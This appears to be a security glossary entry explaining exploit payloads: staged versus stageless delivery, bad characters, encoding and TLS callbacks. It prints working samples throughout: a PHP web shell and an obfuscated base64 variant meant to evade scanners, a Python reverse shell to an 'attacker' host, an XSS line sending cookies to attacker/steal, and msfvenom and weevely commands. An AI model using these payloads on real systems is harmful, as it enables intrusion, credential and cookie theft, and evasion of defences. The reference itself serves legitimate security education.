The code or data delivered by an exploit to achieve objectives like spawning shells, establishing backdoors, or exfiltrating data.
Exploit Payload is the code or data delivered by an exploit to achieve the attacker's objective, such as spawning a shell, establishing a backdoor, or exfiltrating data.
# Stageless: Complete payload in single delivery
# Larger size, but single request
# Staged: Small loader fetches main payload
# Stage 1: Connect back, download stage 2
# Stage 2: Full functionality (meterpreter, shell)
# PHP web shell
<?php system($_GET['cmd']); ?>
# Python reverse shell
import socket,subprocess,os
s=socket.socket()
s.connect(("attacker",4444))
os.dup2(s.fileno(),0)
subprocess.call(["/bin/sh","-i"])
# JavaScript XSS payload
<script>
fetch('https://attacker/steal?c='+document.cookie)
</script>
# Metasploit msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf
# Web shells
weevely generate password shell.php
A memory-corruption payload often travels through a parser that eats certain bytes: a string copy stops at a null (\x00), a line reader breaks on \x0a/\x0d, an HTTP field drops \x20. Those are the payload's bad characters. msfvenom encodes the shellcode so the final bytes avoid them and self-decode at runtime.
# Avoid null, CR, LF; encode with shikata_ga_nai
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=10.0.0.1 LPORT=443 \
-b '\x00\x0a\x0d' -e x64/shikata_ga_nai -f c
Encoding changes the byte pattern, so it also shifts a signature-based scanner off the known stub, though modern engines flag the decoder itself.
A static web shell like <?php system($_GET['cmd']); ?> matches trivially on the string system. Obfuscation hides the sink behind dynamic names and encoding, and polymorphic generators emit a different-looking file each time:
<?php $f = $_GET['a']; $x = base64_decode('c3lzdGVt'); $x($f); ?>
// 'system' never appears as a literal; callable is built at runtime
A stageless payload carries full functionality in one blob (larger, but one round trip). A staged payload sends a tiny loader that pulls the real stage from the handler, keeping the initial delivery small enough to fit a constrained injection point. Running the callback over TLS (reverse_https) wraps the traffic in a normal-looking encrypted session so network inspection sees a TLS flow, not shellcode, and certificate pinning on the handler resists interception.
# Staged, TLS-backed callback
msfvenom -p windows/x64/meterpreter/reverse_https ... # staged
# vs stageless single blob
msfvenom -p windows/x64/meterpreter_reverse_https ... # stageless